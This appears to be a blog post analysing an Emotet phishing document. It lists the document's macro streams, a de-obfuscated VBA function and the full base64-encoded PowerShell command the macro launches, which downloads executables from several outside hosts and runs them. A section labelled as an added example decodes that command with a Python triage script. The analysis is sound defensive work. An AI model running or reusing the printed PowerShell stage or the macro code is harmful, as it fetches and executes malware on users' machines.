Persianov on Security

Emotet malware analysis. Part 1.

This is Part 1 of the Emotet malware analysis I'm planning to post. It covers phases 1 and 2 of the attack: the phishing email and the establishment of persistence on the infected system. Emotet spreads via phishing emails containing malicious links or attachments, and it targets everyone (individuals, companies and governments).

Phase 1. Malicious email and document.

The first phase of the attack starts with a phishing email. The subject, layout, attachments and links are usually modified periodically by the attackers. In this article I'm going to analyze this sample from VirusTotal.

VirusTotal Sample

One of Emotet's characteristics is the constantly changing content of its phishing emails, which usually contain a malicious link or attachment. This article covers the sample that was spread via the following links:

URL
hxxps://www.tenderheartfoundation.org/knqimf/muwcu-xh8fa-vnewt/
hxxp://clyckmedia.com/clientes/ylhq8-zg1ue-iibdnyco/
hxxp://noithathopehome.com/8brl9if/hldd-m2v2fy-xavkpbbl/
hxxp://cllcanada.ca/2010/lmef-jmlr1n-ftkktgp/
hxxp://www.smilefy.com/it3fqqo/rnk6-9mm14-fcnp.view/
hxxp://cadsupportplus.com/assets/nwi2z-20bew-ffuwbfmt/
hxxp://www.sdhjesov.cz/wordpress/papcc-koe6n-lsric.view/
hxxp://bigkidneys.com/42QQXOURJ/gf1lm-hmr0c-lnkcfak/
hxxp://compraventachocados.cl/css/hgkhx-lin1b-zjkebwycv/
hxxp://cruelacid.com/icon/bmza-8dlyf-jemlc/
hxxp://ecommercedefinitivo.com.br/cursos/ryyjt-tnxm7-byxukc/
hxxp://annual.fph.tu.ac.th/wp-content/uploads/ikvv-lt7rlt-bqcnmly/
hxxp://dbtools.com.br/mailer/ezsvr-mqo7i-zgysfrmwr/
hxxp://demu.hu/wp-content/2h2z2-errsh-sxwqgscp/
hxxp://georgekiser.com/test/z6uwt-r0459s-rqkv.view/
hxxp://wdl.usc.edu/wp-includes/zvlp-s69lox-wrkbb.view/
hxxp://dictionary.me/js/bbrj3-tq4eh-izxcuhnb/
hxxp://duncaninstallation.com/images/u32g-mdxys3-gjcwkz/
hxxp://devpro.ro/misc/3wa1-zykhgf-xcjqnfs/

All of the URLs above, once accessed, drop a Microsoft Office document with macros in it.

Checksum:  f5e9c63713c7ff968f4958a9b5161e78af05f21493e56555734b89f55b2be24c
File type: MS Word Document
File size: 246KB (251904 bytes)

Analysis.

According to the output of the file command run against this sample, the document has 1 page and doesn't contain any words:

f5e9c63713c7ff968f4958a9b5161e78af05f21493e56555734b89f55b2be24c: Composite Document File V2 Document, Little Endian, 
Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, 
Create Time/Date: Mon Mar 11 21:32:00 2019, Last Saved Time/Date: Mon Mar 11 21:32:00 2019, Number of Pages: 1, 
Number of Words: 0, Number of Characters: 5, Security: 0

Listing the document's objects with oletools, three streams containing macros (marked with M) were found:

  7:        74 'Macros/PROJECTwm'
  8: M   70540 'Macros/VBA/S1ADDQ1A'
  9: M   14650 'Macros/VBA/YBB1wA'
 10:     49987 'Macros/VBA/_VBA_PROJECT'
 11:      1344 'Macros/VBA/__SRP_0'
 12:       110 'Macros/VBA/__SRP_1'
 13:       436 'Macros/VBA/__SRP_2'
 14:       187 'Macros/VBA/__SRP_3'
 15:       601 'Macros/VBA/dir'
 16: M    9719 'Macros/VBA/mA4QAX4'
 17:      4096 'WordDocument'

Extraction.

Objects 8, 9 and 16 contain Visual Basic code and are therefore the ones of interest for further analysis.

Object Name Checksum Size
8 S1ADDQ1A 34ffc69ff37401b965b04fa4f3c1fbcdffab11fd2e34f9e17a8347b70922398b 44KB (44096 bytes)
9 YBB1wA d51c137e3f591a275628e697d2fbb305cc3c630455480508184b45753608d973 8.8KB (8956 bytes)
16 mA4QAX4 d2e56d56ced7ed8de5f701a873086c8134e1311dd574a607a45023f38d5ecaf7 5.6KB (5671 bytes)

Of all the extracted parts of the script, mA4QAX4 is the entry point: it starts execution as soon as the document is opened. The whole macro code is obfuscated, as seen in the image below.

Macros Entry Point

All three parts depend on each other and have to be merged for further analysis. You can find the merged script HERE.

The call chain looks like this:

  1. autoopen();
  2. iQwUcAAU(param):
    • Creates a Win32_ProcessStartup class;
    • Creates an object of the class by calling its Create method;
    • Passes the param string as the command argument, thus starting the execution.

The value of param consists of the concatenated results of the following functions: SQoBUAA, vDXBUQ, rDCAQQcA, pAADAADD, k1kGUAB and cAABQDw. All of these functions have similar logic and were easy to de-obfuscate. Below is the clean version of SQoBUAA:

Function SQoBUAA()
' De-obfuscated version: returns a fragment of the PowerShell command line ("-nop -enc <base64>")
' that is assembled from many small string pieces to defeat simple keyword matching.
On Error Resume Next
jkQBUx = "l -" + "nop" + " -e" + "n" + "c" + " JA" + "BHA" + "G" + "8Aa" + "wB" + "HA" + "E" + "M" + "AN" + "A" + "B" + "B" + "A" + "D" + "QA" + "PQ" + "A" + "oAC"
lBADQoU = "cAe" + "gBf" + "AC" + "cAK" + "w" + "An" + "AEE" + "AWg" + "AnA" + "CsA" + "Jw" + "Br" + "A" + "G8A" + "RAB"
tcoAAAAQ = "B" + "ACc" + "A" + "K" + "Q" + "A7A" + "CQ" + "AU" + "gBf" + "AEE" + "A" + "a" + "w" + "AxA" + "F8"
HAQUxA_ = "AQQ" + "BBA" + "D0" + "Abg" + "BlA" + "Hc" + "ALQ" + "BvA" + "GI" + "Aa" + "gBl" + "AG" + "MAd" + "A" + "AgA" + "E" + "4" + "A" + "Z" + "QB0" + "A" + "C" + "4A" + "VwB" + "lAG"
tUQokAA = "IA" + "Qw" + "Bs" + "AGk" + "AZQ" + "Bu" + "AH" + "Q" + "A" + "O" + "wA" + "kAG" + "k" + "AVQ" + "Bv" + "AF" + "8AR" + "ABB" + "AD" + "0" + "AK" + "AA" + "n" + "A" + "GgA"
cUAAoX = "d" + "AAn" + "ACs" + "AJw" + "B0" + "AH" + "A" + "AOg" + "A" + "vA" + "C8A" + "Yg" + "B" + "pA" + "G" + "U" + "A" + "ZAB" + "l" + "A" + "H" + "I" + "A" + "bQ" + "Bh"
AkQG_A = "A" + "Cc" + "AKw" + "An" + "AG" + "4AL" + "g" + "B" + "uAG" + "UAd" + "AA" + "vAG" + "wA" + "ZQB" + "zAG" + "wA" + "a" + "QBl"
SQoBUAA = jkQBUx + lBADQoU + tcoAAAAQ + HAQUxA_ + tUQokAA + cUAAoX + AkQG_A
End Function

Phase 2. Persistent Powershell.

The document macros extract a base64-encoded PowerShell script and set it to run at system startup.

powershell -nop -enc JABHAG8AawBHAEMANABBADQAPQAoACcAegBfACcAKwAnAEEAWgAnACsAJwBrAG8ARABBACcA
KQA7ACQAUgBfAEEAawAxAF8AQQBBAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAVQBvAF8ARABBAD0AKAA
nAGgAdAAnACsAJwB0AHAAOgAvAC8AYgBpAGUAZABlAHIAbQBhACcAKwAnAG4ALgBuAGUAdAAvAGwAZQBzAGwAaQBlAC8AbAAnACsAJwBMAC8AJwArACcAQABoAH
QAdABwADoALwAnACsAJwAvAG4AaQBzAHMAYQAnACsAJwBuAGIAYQAnACsAJwBjAGcAaQBhACcAKwAnAG4AZwAnACsAJwAuAGMAJwArACcAbwBtAC8AdwBwAC0AY
wBvACcAKwAnAG4AdABlAG4AdAAnACsAJwAvAHgAUgAnACsAJwAzAC8AJwArACcAQAAnACsAJwBoAHQAdAAnACsAJwBwADoALwAnACsAJwAvAGUAcQB1AGkAZABh
AGQAZABlAGcAZQBuAGUAcgAnACsAJwBvAC4AJwArACcAaQB6AHQAJwArACcAYQBjAGEAbABhAC4AdQAnACsAJwBuAGEAbQAuAG0AeAAvACcAKwAnAHcAcAAtAGE
AZABtAGkAbgAvACcAKwAnAFgAUABGAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AJwArACcAegAnACsAJwBlAHMAdABlAHYAZQBuAHQAJwArACcAcwAuAGMAbw
AvAHcAcAAtACcAKwAnAGkAJwArACcAbgBjAGwAdQBkAGUAcwAvAEcAJwArACcASgBBACcAKwAnAG8ALwBAAGgAdAB0AHAAJwArACcAOgAvAC8AJwArACcAcwB0A
HkAJwArACcAbABpACcAKwAnAHMAaABsAGEAYgAuAHcAZQBiAHAAaQB4AGEAYgB5AHQAJwArACcAZQAnACsAJwAuAGMAJwArACcAbwBtAC8AdAAnACsAJwBoAGoA
bwB3AHIAawA1ACcAKwAnAGUALwA5AFUARwAvACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAHYAWgBBAEEAQgA0AD0AKAAnAFEAQwBBAEIAJwArACcAQgB
BAFUAJwApADsAJABKAFUAQQBrAEEAQQAgAD0AIAAoACcANAA4ACcAKwAnADYAJwApADsAJABGAGsAWgBBAEQAWgBVAD0AKAAnAGoAJwArACcANABfAEEAQQBCAE
EAJwApADsAJABtAFEAVQBrAHcARwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASgBVAEEAawBBAEEAKwAoACcALgBlACcAK
wAnAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJAByAEIAQQBCAEQAbwAgAGkAbgAgACQAaQBVAG8AXwBEAEEAKQB7AHQAcgB5AHsAJABSAF8AQQBrADEAXwBB
AEEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAcgBCAEEAQgBEAG8ALAAgACQAbQBRAFUAawB3AEcAKQA7ACQAQwBYAGsAQQBBADQAQQA9ACgAJwBWADQ
AQgBBACcAKwAnAEEAawBBACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAG0AUQBVAGsAdwBHACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANA
AwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAbQBRAFUAawB3AEcAOwAkAG4ARABBAEEAdwBvAFgAPQAoACcAcwAnACsAJwBvAEEAeABBA
EQAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGMAdwBRAEEAQQBRAHgAPQAoACcARQBCAG8AYwAnACsAJwBBAEEAJwApADsA

Once decoded, several URLs show up; these serve the phase 3 PE files.

Decoded powershell

In total there are 5 different websites hosting the Emotet malware.

URL Dropped PE Checksum Size
hxxp://biederman.net/leslie/lL/ e76900b9b50306564c415423e0eb28463722b0427186134ba301209b4ed2f440 180KB (183560 bytes)
hxxp://nissanbacgiang.com/wp-content/xR3/ 5c2fbc0eaae6ccc8342c22325f0aca1e989beec8d578e3fe57722b807a46c773 180KB (183560 bytes)
hxxp://equidaddegenero.iztacala.unam.mx/wp-admin/XPF/ bc0d53d74f3f4ef286b4f4caeb8d8b77e32cc17b808dd0de5674842ad713dd72 180KB (183560 bytes)
hxxp://stylishlab.webpixabyte.com/thjowrk5e/9UG/ 1c06da405051cfc9f68dbb404e338abb90a38db29f86f17e01487ac2c921c05d 251KB (256264 bytes)
hxxp://www.zestevents.co/wp-includes/GJAo/ 403 HTTP Error N/A
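The decoding described above (the -enc argument is base64 over UTF-16LE text, and the decoded script hides its strings behind 'a'+'b' concatenation) can be reproduced offline. The following Python is an added example, not the author's code: it embeds the -enc blob and the jkQBUx fragment of SQoBUAA exactly as printed in this post, folds the string concatenation in both the PowerShell and the VBA quoting style, extracts the URL list that the script splits on '@', and checks that the macro's fragment really is the start of the PowerShell argument. The function names (decode_encoded_command, fold_string_concatenation, extract_download_urls, triage) are the example's own.

```python
# Added example: decode and triage the -enc PowerShell stage dropped by the Emotet document.
import base64
import re
from typing import List, Optional

# The -enc argument exactly as printed in the post, with the wrapped lines joined.
ENCODED_COMMAND = (
    "JABHAG8AawBHAEMANABBADQAPQAoACcAegBfACcAKwAnAEEAWgAnACsAJwBrAG8ARABBACcA"
    "KQA7ACQAUgBfAEEAawAxAF8AQQBBAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAVQBvAF8ARABBAD0AKAA"
    "nAGgAdAAnACsAJwB0AHAAOgAvAC8AYgBpAGUAZABlAHIAbQBhACcAKwAnAG4ALgBuAGUAdAAvAGwAZQBzAGwAaQBlAC8AbAAnACsAJwBMAC8AJwArACcAQABoAH"
    "QAdABwADoALwAnACsAJwAvAG4AaQBzAHMAYQAnACsAJwBuAGIAYQAnACsAJwBjAGcAaQBhACcAKwAnAG4AZwAnACsAJwAuAGMAJwArACcAbwBtAC8AdwBwAC0AY"
    "wBvACcAKwAnAG4AdABlAG4AdAAnACsAJwAvAHgAUgAnACsAJwAzAC8AJwArACcAQAAnACsAJwBoAHQAdAAnACsAJwBwADoALwAnACsAJwAvAGUAcQB1AGkAZABh"
    "AGQAZABlAGcAZQBuAGUAcgAnACsAJwBvAC4AJwArACcAaQB6AHQAJwArACcAYQBjAGEAbABhAC4AdQAnACsAJwBuAGEAbQAuAG0AeAAvACcAKwAnAHcAcAAtAGE"
    "AZABtAGkAbgAvACcAKwAnAFgAUABGAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AJwArACcAegAnACsAJwBlAHMAdABlAHYAZQBuAHQAJwArACcAcwAuAGMAbw"
    "AvAHcAcAAtACcAKwAnAGkAJwArACcAbgBjAGwAdQBkAGUAcwAvAEcAJwArACcASgBBACcAKwAnAG8ALwBAAGgAdAB0AHAAJwArACcAOgAvAC8AJwArACcAcwB0A"
    "HkAJwArACcAbABpACcAKwAnAHMAaABsAGEAYgAuAHcAZQBiAHAAaQB4AGEAYgB5AHQAJwArACcAZQAnACsAJwAuAGMAJwArACcAbwBtAC8AdAAnACsAJwBoAGoA"
    "bwB3AHIAawA1ACcAKwAnAGUALwA5AFUARwAvACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAHYAWgBBAEEAQgA0AD0AKAAnAFEAQwBBAEIAJwArACcAQgB"
    "BAFUAJwApADsAJABKAFUAQQBrAEEAQQAgAD0AIAAoACcANAA4ACcAKwAnADYAJwApADsAJABGAGsAWgBBAEQAWgBVAD0AKAAnAGoAJwArACcANABfAEEAQQBCAE"
    "EAJwApADsAJABtAFEAVQBrAHcARwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASgBVAEEAawBBAEEAKwAoACcALgBlACcAK"
    "wAnAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJAByAEIAQQBCAEQAbwAgAGkAbgAgACQAaQBVAG8AXwBEAEEAKQB7AHQAcgB5AHsAJABSAF8AQQBrADEAXwBB"
    "AEEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAcgBCAEEAQgBEAG8ALAAgACQAbQBRAFUAawB3AEcAKQA7ACQAQwBYAGsAQQBBADQAQQA9ACgAJwBWADQ"
    "AQgBBACcAKwAnAEEAawBBACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAG0AUQBVAGsAdwBHACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANA"
    "AwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAbQBRAFUAawB3AEcAOwAkAG4ARABBAEEAdwBvAFgAPQAoACcAcwAnACsAJwBvAEEAeABBA"
    "EQAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGMAdwBRAEEAQQBRAHgAPQAoACcARQBCAG8AYwAnACsAJwBBAEEAJwApADsA"
)

# Right-hand side of jkQBUx from the de-obfuscated SQoBUAA function in the post.
VBA_FRAGMENT = ('"l -" + "nop" + " -e" + "n" + "c" + " JA" + "BHA" + "G" + "8Aa" + "wB" + "HA" '
                '+ "E" + "M" + "AN" + "A" + "B" + "B" + "A" + "D" + "QA" + "PQ" + "A" + "oAC"')


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand / -enc is base64 over UTF-16LE text, not UTF-8."""
    raw = base64.b64decode("".join(blob.split()))
    return raw.decode("utf-16-le")


def fold_string_concatenation(script: str, quote: str = "'") -> str:
    """Merge adjacent quoted literals joined by '+' until nothing changes.

    Handles the 'a'+'b' (PowerShell) and "a" + "b" (VBA) pattern this dropper
    uses; it is not a full parser and leaves variable references untouched.
    """
    q = re.escape(quote)
    pair = re.compile(rf"{q}([^{q}]*){q}\s*\+\s*{q}([^{q}]*){q}")
    previous = None
    while previous != script:
        previous = script
        script = pair.sub(lambda m: quote + m.group(1) + m.group(2) + quote, script)
    return script


def fold_vba_fragment(expression: str) -> str:
    """Fold a VBA "a" + "b" expression down to the plain string it builds."""
    return fold_string_concatenation(expression, quote='"').strip().strip('"')


def extract_download_urls(folded: str) -> List[str]:
    """Return the URL list the script builds and then splits on '@'."""
    match = re.search(r"\('([^']*)'\)\.Split\('@'\)", folded)
    return match.group(1).split("@") if match else []


def extract_size_threshold(folded: str) -> Optional[int]:
    """Minimum file length the script requires before it runs the download."""
    match = re.search(r"\.length\s+-ge\s+(\d+)", folded, re.IGNORECASE)
    return int(match.group(1)) if match else None


def triage(blob: str) -> dict:
    """Decode, de-obfuscate and summarise the behaviour of the stage."""
    folded = fold_string_concatenation(decode_encoded_command(blob))
    return {
        "urls": extract_download_urls(folded),
        "min_payload_bytes": extract_size_threshold(folded),
        "downloads": "DownloadFile" in folded,
        "executes": "Invoke-Item" in folded,
        "writes_to_userprofile": "$env:userprofile" in folded,
        "folded_script": folded,
    }


def macro_fragment_matches_blob(fragment: str, blob: str) -> bool:
    """Check that the macro's base64 fragment is the start of the -enc argument."""
    prefix = fold_vba_fragment(fragment).split()[-1]
    return blob.startswith(prefix)


if __name__ == "__main__":
    summary = triage(ENCODED_COMMAND)
    for url in summary["urls"]:
        print("payload URL:", url)
    print("size check :", summary["min_payload_bytes"], "bytes")
    print("download=%s execute=%s" % (summary["downloads"], summary["executes"]))
    print("macro fragment is start of blob:", macro_fragment_matches_blob(VBA_FRAGMENT, ENCODED_COMMAND))
```

The folded script lists the five hosts from the table above in the order biederman.net, nissanbacgiang.com, equidaddegenero.iztacala.unam.mx, www.zestevents.co and stylishlab.webpixabyte.com, and it also shows the check the stage performs before executing: the file written under $env:userprofile is only run if it is at least 40000 bytes long, so a 403 error page such as the one returned by the zestevents.co host is skipped and the loop moves on to the next URL. The folder is intentionally limited to literal-plus-literal pairs; it leaves variable references alone rather than trying to emulate PowerShell.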

Conclusion.

It looks like the group behind Emotet hasn't focused on heavily obfuscating the phase 1 and 2 scripts. Analysis of the downloaded samples will follow in Part 2 of this article.